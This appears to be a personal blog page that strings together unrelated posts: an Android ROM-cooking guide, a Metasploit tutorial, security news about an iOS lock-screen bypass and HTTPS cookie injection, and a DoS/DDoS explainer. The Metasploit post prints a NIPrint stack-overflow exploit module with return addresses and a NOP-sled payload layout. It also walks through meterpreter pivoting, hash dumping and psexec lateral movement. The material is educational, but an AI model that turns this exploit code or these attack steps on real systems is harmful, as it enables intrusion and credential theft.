Vivek Pancholi's Official Blog

ROM Development and Porting

My Offically Developed and Ported ROM For Gionee Pioneer P4

IOS Themed ROM:

Download it from here!!

Vivek Pancholi

ROM Development Official Guide

Prerequisites:-                                         (Part:-1)

1)Java JDK/SDK/NDK(Any One Of Them)

2)Android SDK(Software Development Kit)

3)Cygwin(Linux Terminal For Windows)

4)Android Kitchen(For ROM Cooking)

5)META-INF Folder(For Updater script and Many More)(Most Important!!!)

6)Custom BOOT.img(For custom boot animation)

7)Your Skills of Programming Like Shell Scripting and Bash scripting and also batch scripting for use of kitchen(Must Needed)


Get Started:-

1)At first You must install Java JDK

2)Download and extract the

3)Open Set-up.exe and install step by step(follow Must readme.txt)

4)  local package directory must be the path to the cygwin_packages folder that you just extracted

5)when it shows all the package names, go to the top and select "all  default" until it changes to "all  install"


6)Download the kitchen from above. Then, extract the kitchen's .zip file to a folder under your home account. Rename the dsixda-android-kitchen- folder to just "kitchen". In Cygwin, this folder would depend on what was set for your Cygwin install directory, e.g. C:\cygwin\home\John\kitchen
NOTE!! If your user folder contains spaces (e.g. C:\cygwin\home\User_name\kitchen), then the kitchen will not function properly. Instead, copy it under C:\cygwin\home\kitchen.

7)those who have their kitchen like this C:\cygwin\home\User\kitchen use these commands given below.

            cd kitchen



                                                                (Part:-2)(Setting up a working folder)

There are two methods for this.
1. When you have base ROM available.
2. When you don't have base ROM.

First method -

  •     First our folder structure should look like this:

             cygwin folder/home/your user name/kitchen

  • Inside the kitchen it should look like this:
  • Now we need a rom to work on,  you can use any rom.
    Just Place the original rom zip in the original_update folder inside the kitchen.
  • run the cygwin.exe again type:


  1. cd kitchen(enter)
  2. ./menu(enter)
  • now enter option 1, enter again. You should see your rom listed, choose and enter
    you will be asked about changing the working folders name, at this point it makes no difference so just continue.
  • congratulations you have a working folder!!!

Second method:-

First make a working folder in CYGWIN folder

It should look like this
cygwin folder/home/your user name/kitchen/WORKING_(your rom name)
Note: For this method we need 3 files and folders to be placed in working folder.
1. META-INF folder
2. System folder

2. getting system folder
(Note - You must be rooted for this method)

  • This is universal method and can be done easily using terminal emulator.
    For this simply download Terminal Emulator from Android Market.
    we need freshly flashed device here. OTHERWISE YOU WILL HAVE LOT OF JUNK FILES.
  • Open it and type:
tar -c system/* >> sdcard/system.tar

This will copy all your /system folder to your SDcard with name System.tar
This will take some time to finish so be patient.

  • After it's done you should have a tar file in your /sdcard named system.tar

    You can extract it using Winrar or 7zip software. But yes this will have huge size , as it has other useless folders so you will have to delete them. After extracting this system.tar file you will get following folders (Similar one)


  •     /etc
  •     /fonts
  •     /framework
  •     /lib
  •     /lost-found
  •     /media
  •     /sd
  •     /semc
  •     /usr
  •     /xbin
  •     build.prop
  •     And some other files and folders like ""autorooted,kernel files" etc

Now simply delete the folders marked in red color and its done.Don't worry  if you don't have folders with red colors above,we don't need them.

And the final files that we will have in our system folders will be:-


  •     /app
  •     /bin
  •     /etc
  •     /fonts
  •     /framework
  •     /lib
  •     /media
  •     /semc
  •     /usr
  •     /xbin
  •     build.prop


  • If it dont have semc folder no need to worry.
    Note: You can also get this system folder by using any ROOT browser. Just find this folder and copy/extract to SD card
  • Now copy this system folder to working folder

3. getting boot.img

Here we have 2 options
1. stock boot.img from stock rom - simple kernel which we get in brand new mobile.
2. custom boot.img from custom kernel - kernel which are modified for overclock or other features

1. getting stock boot.img from stock rom.
extract your stock rom with winrar or 7zip. you will see boot.img there. copy it to working folder

2. getting custom boot.img from custom kernel.

    download any custom kernel which is only for your device
    extract it with winrar or 7zip and copy boot.img to working folder

NOTE: many of new devices have kernel.bin and other files instead of boot.img so skip this part if your device don't have it...
Step Three :change/modify/update rom

You can modify your ROM in two steps:
  • Modify using Android kitchen - for basic modification.
  • Modify manually - for advanced modification.

1. Modifying using Android kitchen
You simply modify build.prop and add custom kernel (boot.IMG)
You can also modify your boot animation(imply add /system/media) file
For more view please visit:-















blog post

An Exploitation Tool :Metasploit Unleashed

A couple weeks ago I rewrote a vulnerability for Metasploit that I originally wrote for CANVAS. The exploit is for a network printer application called NIPrint. It is a pretty basic stack overflow vulnerability and the language to the exploit is fairly straight forward.

The key parts, from a Metasploit user’s prospective, is the Target section and the options section. A user will need to select the host ip and the port, if the port is not the default, and the target operating system, the default target default is Windows 2000. The top portion of the code sets up the options while the lower section performs the actual exploit.

require 'msf/core'
class Metasploit3 <  Msf::Exploit::Remote
    Rank = NormalRanking
    include Msf::Exploit::Remote::Tcp
    def initialize(info =  {})
          'Name' => 'NIPrint stack overflow',
          'Description' => %q{
            This module exploits a stack overflow in
            NIPrint  server.
          'Author' =>  [ 'Charles Perine' ],
          'Version' =>  '$Revision: 9999 $',
          'DefaultOptions' =>  {
            'EXITFUNC' => 'process',
          'Payload'         =>
            'Space'    => 1000,
            'BadChars'  => "\x00\x0a\x0d\x25\x26\x3f",
          'Platform'        => 'win',
          'Targets'        =>
            ['Win2k  SP4 Eng', { 'Ret' => 0x7C2EE9BB } ],
            ['WinXP  SP3 Eng', { 'Ret' => 0x77DF9697 } ],
          'DefaultTarget'  => 0,
          'Privileged'      => false
       register_options( [  Opt::RPORT(515) ], self.class)

    def exploit
        noppersled1  = make_nops(47)
        jmpcode = "\xeb\x10"
        noppersled2  = make_nops(20)
        eip = [target.ret].pack('V')
        sploit  = noppersled1 + jmpcode + eip + noppersled2 + payload.encoded

What follows is a run through of a hack detailing some of the subjects I covered in this and my previous Metasploit entries. My attack machine is on the same subnet,, as a Windows XP system with a vulnerable FTP server at The FTP server is connected to another subnet,, with a machine running Windows 2000,, and the NIPrint application. In this example I will not show system scanning, using a tool like Nessus, simply exploitation.

First I ran the exploit against the FTP server.

Once connected, I check to see what other networks the FTP server is connected to. We see that the it is connected to the network. To perform the pivot, I simply add the a network route for the Meterpreter session, session 1. Next I ran an enumeration script to see what other systems were available.

From the scan, I can see the system is available. While I know that the system second system is running the NIPrint server, an attacker would use other reconnaissance tools, or simply monitor the network, to determine a system on the network is running the NIPrint application.

Now I run the exploit against the second system and we can see it’s routing tables are different from the first system.

Here is a list of commands I used:

use windows/ftp/easyftp_cwd_fixret
set PAYLOAD  windows/meterpreter/bind_tcp
show options



route add 1

sessions  -i 1

run netenum -ps -r


use  windows/misc/myniprint
set PAYLOAD windows/meterpreter/bind_tcp
show options


Exploit Development And working with exploit

Exploit Module Format

Exploit Development

Formatting our Exploit Module

The format of an Exploit Module in Metasploit is similar to that of an Auxiliary Module but there are more fields.

  • There is always a Payload Information Block. An Exploit without a Payload is simply an Auxiliary Module.
  • A listing of available Targets is outlined.
  • Instead of defining run(), exploit() and check() are used.


Exploit Module Skeleton

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::TCP

      def initialize
               'Name'          => 'Simplified Exploit Module',
               'Description'   => 'This module sends a payload',
               'Author'        => 'My Name Here',
               'Payload'       => {'Space' => 1024, 'BadChars' => “\x00”},
               'Targets'       => [ ['Automatic', {} ] ],
               'Platform'      => 'win',
           register_options( [
           ], self.class)

      # Connect to port, send the payload, handle it, disconnect
      def exploit


Defining an Exploit Check

Although it is rarely implemented, a method called check() should be defined in your exploit modules whenever possible.

  • The check() method verifies all options except for payloads.
  • The purpose of doing the check is to determine if the target is vulnerable or not.
  • Returns a defined Check value.

The return values for check() are:

  • CheckCode::Safe – not exploitable
  • CheckCode::Detected – service detected
  • CheckCode::Appears – vulnerable version
  • CheckCode::Vulnerable – confirmed
  • CheckCode::Unsupported – check is not supported for this module.


proftp banner module | Metasploit unleashed

proftp banner module | Metasploit unleashed

Banner Grabbing : Sample check() Method

def check
     # connect to get the FTP banner

     # grab banner
     banner = banner = sock.get_once

     # disconnect since have cached it as self.banner
     case banner
          when /Serv-U FTP Server v4\.1/
               print_status('Found version, exploitable')
               return Exploit::CheckCode::Vulnerable

          when /Serv-U FTP Server/
               print_status('Found an unknown version, try it!');
               return Exploit::CheckCode::Detected

               print_status('We could not recognize the server banner')
               return Exploit::CheckCode::Safe

     return Exploit::CheckCode::Safe

Penetration With Armitage

In the scan we conducted earlier, we see that one of our targets is running Windows XP SP2 so we will attempt to run the exploit for MS08-067 against it. We select the host we would like to attack, find the exploit in the tree, and double-click on it to bring up the configuration for it.

Armitage ms08-067

As with our selective scanning conducted earlier, all of the necessary configuration has been setup for us. All we need to do is click “Launch” and wait for the Meterpreter session to be opened for us. Note in the image below that the target graphic has changed to indicate that it has been exploited.

Armitage shell

When we right-click on our exploited host, we can see a number of new and useful options available to us.

Armitage interact menu

We dump the hashes on the exploited system in an attempt to leverage password re-use to exploit the other targets. Selecting the remaining hosts, we use the “psexec” module with the Administrator username and password hash we already acquired.

Armitage psexec config

Now we just click “Launch” and wait to receive more Meterpreter shells!

Armitage multiple shells

As can be plainly seen from this brief overview, Armitage provides an amazing interface to Metasploit and can be a great timesaver in many cases. A static posting cannot truly do Armitage justice but fortunately, the author has posted some videos on the Armitage Website that demonstrates the tool very well.

blog post

iOS 9.0.1 – Apple's first update to its new iOS 9 mobile operating system, came out on Wednesday, addressed several bugs in its software.
However, unfortunately, it seems that the latest update iOS 9.0.1 doesn't fix the lock screen bypass vulnerability reported by iPhone user Jose Rodriguez.
Yes, the serious flaw in iOS 9 that allows anyone – with physical access of your iPhone or iPad – to bypass your device's lock screen and get into your contacts and personal photographs, also Works on iOS 9.0.1.
The lock screen bypass vulnerability works on all iOS versions from iOS 5.1.1 to the latest released iOS 9.0.1.


So, until Apple rolls out an update to patch this bug, the only way available to iPhone users to mitigate the issue is to disable Siri from being accessed from the lock screen.
To disable Siri on the lock screen, follow these simple steps:
  • Go to Settings
  • Select Touch ID & Passcode
  • Enter your passcode in the prompt
  • Look for "Allow access when locked" section and Disable Siri
The iOS lock screen bug is similar to that fixed in the latest version of Android Lollipop. The Android lock screen bypass bug was far more complex than the current iOS bypass, as well as the impact was also worse.
The Android lock screen bypass gave attackers access to all important files as well as the ability to install malicious apps on the affected device.
However, it's been a bad week for Apple's iOS security with the discovery of nearly 4,000 malware-infected applications on the App Store.

blog post

A newly discovered critical flaw in the implementation of web cookies by major browsers could open secured (HTTPS) browsing to Man-in-the-middle attacks.
The US Computer Emergency Response Team (CERT) has revealed that all the main browser vendors have improperly implemented the RFC 6265 Standard, also referred to as "Browser Cookies," allowing…
…remote attackers to bypass secure HTTPS protocol and reveal confidential private session data.
Cookies are small pieces of data sent from web sites to web browsers, which contains various information used to identify users, or store any information related to that particular website.

HTTPS Cookie Injection Vulnerability

Whenever a website (you have visited) wants to set a cookie in your browser, it passes a header named “Set-Cookie” with the parameter name, its value and some options, including cookie expiration time and domain name (for which it is valid).
It is also important to note that HTTP based websites does not encrypt the headers in any way, and to solve this issue websites use HTTPS cookies with "secure flag", which indicates that the cookies must be sent (from browser to server) over a secure HTTPS connection.
However, the researchers found that some major web browsers accept cookies via HTTPS, without even verifying the source of the HTTPS cookies (cookie forcing), allowing attackers with man-in-the-middle position on a plain-text HTTP browsing session to inject cookies that will be used for secure HTTPS encrypted sessions.
For an unprotected browser, an attacker can set HTTPS cookie masquerading as another site ( and override the real HTTPS cookie in such a way that even the user might not realise it's a fake while looking through their cookie list.
Now, this malicious HTTPS cookie is controlled by the attacker, thus being able to intercept and grab private session information.
The issue was first revealed at the 24th USENIX Security Symposium in Washington in August when researchers presented their paper that said that cookie injection attacks are possible with major websites and popular open source applications including…
…Google, Amazon, eBay, Apple, Bank of America, BitBucket, China Construction Bank, China UnionPay,, phpMyAdmin, and MediaWiki, among others.

Affected Browsers:

The Affected major web browsers includes previous versions of:
  • Apple’s Safari
  • Mozilla’s Firefox
  • Google’s Chrome
  • Microsoft’s Internet Explorer
  • Microsoft’s Edge
  • Opera
However, the good news is that the vendors have now fixed the issue. So, if you want to protect yourself from this kind of cookie injection MitM (Man-in-the-Middle) attack vectors, upgrade to the latest versions of these web browsers.
CERT also recommended webmasters to deploy HSTS (HTTP Strict Transport Security) on their top-level domain.

blog post

blog post


A Denial of Service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.


DoS and DDoS Attack

It is important to differentiate between Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks.

In a DoS attack, one computer and one internet connection is used to flood a server with packets, with the aim of overloading the targeted server’s bandwidth and resources.

A DDoS attack, uses many devices and multiple Internet connections, often distributed globally into what is referred to as a botnet. A DDoS attack is, therefore, much harder to deflect, simply because there is no single attacker to defend from, as the targeted resource will be flooded with requests from many hundreds and thousands of multiple sources. 

Types of DoS Attacks

The most common type of Denial of Service attack involves flooding the target resource with external communication requests. This overload prevents the resource from responding to legitimate traffic, or slows its response so significantly that it is rendered effectively unavailable.

Resources targeted in a DoS attack can be a specific computer, a port or service on the targeted system, an entire network, a component of a given network any system component. DoS attacks may also target human-system communications (e.g. disabling an alarm or printer), or human-response systems (e.g. disabling an important technician's phone or laptop).

DoS attacks can also target tangible system resources, such as computational resources (bandwidth, disk space, processor time); configuration information (routing information, etc.); state information (for example, unsolicited TCP session resetting). Moreover, a DoS attack can be designed to: execute malware that maxes out the processor, preventing usage; trigger errors in machine microcode or sequencing of instructions, forcing the computer into an unstable state; exploit operating system vulnerabilities to sap system resources; crash the operating system altogether. 
The overriding similarity in these examples is that, as a result of the successful Denial of Service attack, the system in question does not respond as before, and service is either denied or severly limited.


Types of DDoS Attacks

DDoS attacks can divided in three types:

  • Volume Based Attacks - This type of attack includes UDP floods, ICMP floods, and other spoofed packet floods. The goal of this DDoS attack is to saturate the bandwidth of the attacked site. The magnitude of a volume-based attack is usually measured in Bits per second.
  • Protocol Attacks - This type of DDoS attack consumes the resources of either the servers themselves, or of intermediate communication equipment, such as routers, load balancers and even some firewalls. Some examples of protocol attacks include SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. Protocol attacks are usually measured in Packets per second.
  • Application Layer Attacks - Perhaps the most dangerous type of DDoS attack, application layer attacks are comprised of seemingly legitimate and innocent requests. The intent of these attacks is to crash the web server. SDome examples of application layer attacks include Slowloris, Zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. The magnitude of this type of attack is measured in Requests per second.


Symptoms and Manifestations

The United States Computer Emergency Readiness Team (US-CERT) defines symptoms of denial-of-service attacks to include:

  • Unusually slow network performance (opening files or accessing web sites)
  • Unavailability of a particular web site
  • Inability to access any web site
  • Dramatic increase in the number of spam emails received—(this type of DoS attack is considered an e-mail bomb)[2]
  • Disconnection of a wireless or wired internet connection
  • The term "hit offline" being used on you, then you (the target) may disconnect from the internet

Denial-of-service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by an attack, compromising not only the intended computer, but also the entire network.

If the attack is conducted on a sufficiently large scale, entire geographical regions of Internet connectivity can be compromised without the attacker's knowledge or intent by incorrectly configured or flimsy network infrastructure equipment.


Methods of attack

A "Denial-of-Service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.

A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:

  1. Consumption of computational resources, such as bandwidth, disk space, or processor time.
  2. Disruption of configuration information, such as routing information.
  3. Disruption of state information, such as unsolicited resetting of TCP sessions.
  4. Disruption of physical network components.
  5. Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

A DoS attack may include execution of malware intended to:[citation needed]

  1. Max out the processor's usage, preventing any work from occurring.
  2. Trigger errors in the microcode of the machine.
  3. Trigger errors in the sequencing of instructions, so as to force the computer into an unstable state or lock-up.
  4. Exploit errors in the operating system, causing resource starvation and/or thrashing, i.e. to use up all available facilities so no real work can be accomplished or it can crash the system itself
  5. Crash the operating system itself.


Preventing DoS and DDoS Vulnerabilities

Defending against Denial of Service attacks typically involves the use of a combination of attack detection, traffic classification and response tools, aiming to block traffic that they identify as illegitimate and allow traffic that they identify as legitimate. A list of prevention and response tools is provided below:

Firewalls can be setup to have simple rules such to allow or deny protocols, ports or IP addresses. In the case of a simple attack coming from a small number of unusual IP addresses for instance, one could put up a simple rule to drop all incoming traffic from those attackers.

More complex attacks will however be hard to block with simple rules: for example, if there is an ongoing attack on port 80 (web service), it is not possible to drop all incoming traffic on this port because doing so will prevent the server from serving legitimate traffic. Additionally, firewalls may be too deep in the network hierarchy. Routers may be affected before the traffic gets to the firewall. Nonetheless, firewalls can effectively prevent users from launching simple flooding type attacks from machines behind the firewall.

Some stateful firewalls, like OpenBSD's pf packet filter, can act as a proxy for connections: the handshake is validated (with the client) instead of simply forwarding the packet to the destination. It is available for other BSDs as well. In that context, it is called "synproxy".

Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and Bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN Link failover and balancing.

These schemes will work as long as the DoS attacks are something that can be prevented by using them. For example SYN flood can be prevented using delayed binding or TCP splicing. Similarly content based DoS may be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using Bogon filtering. Automatic rate filtering can work as long as you have set rate-thresholds correctly and granularly. Wan-link failover will work as long as both links have DoS/DDoS prevention mechanism.

Similar to switches, routers have some rate-limiting and ACL capability. They, too, are manually set. Most routers can be easily overwhelmed under DoS attack. Cisco IOS has features that prevent flooding, i.e. example settings.

Application Front-end Hardware
Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors.

IPS Based Prevention
Intrusion-prevention systems (IPS) are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. Intrusion-prevention systems which work on content recognition cannot block behavior-based DoS attacks.

An ASIC based IPS may detect and block denial of service attacks because they have the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way.

A rate-based IPS (RBIPS) must analyze traffic granularly and continuously monitor the traffic pattern and determine if there is traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.

DDS Based Defense
More focused on the problem than IPS, a DoS Defense System (DDS) is able to block connection-based DoS attacks and those with legitimate content but bad intent. A DDS can also address both protocol attacks (such as Teardrop and Ping of death) and rate-based attacks (such as ICMP floods and SYN floods).

Like IPS, a purpose-built system, such as the well-known Top Layer IPS products, can detect and block denial of service attacks at much nearer line speed than a software based system.

Blackholing and Sinkholing
With blackholing, all the traffic to the attacked DNS or IP address is sent to a "black hole" (null interface, non-existent server, ...). To be more efficient and avoid affecting network connectivity, it can be managed by the ISP.

Sinkholing routes to a valid IP address which analyzes traffic and rejects bad ones. Sinkholing is not efficient for most severe attacks.

Clean Pipes
All traffic is passed through a "cleaning center" or a "scrubbing center" via various methods such as proxies, tunnels or even direct circuits, which separates "bad" traffic (DDoS and also other common internet attacks) and only sends good traffic beyond to the server. The provider needs central connectivity to the Internet to manage this kind of service unless they happen to be located within the same facility as the "cleaning center" or "scrubbing center".

View older posts »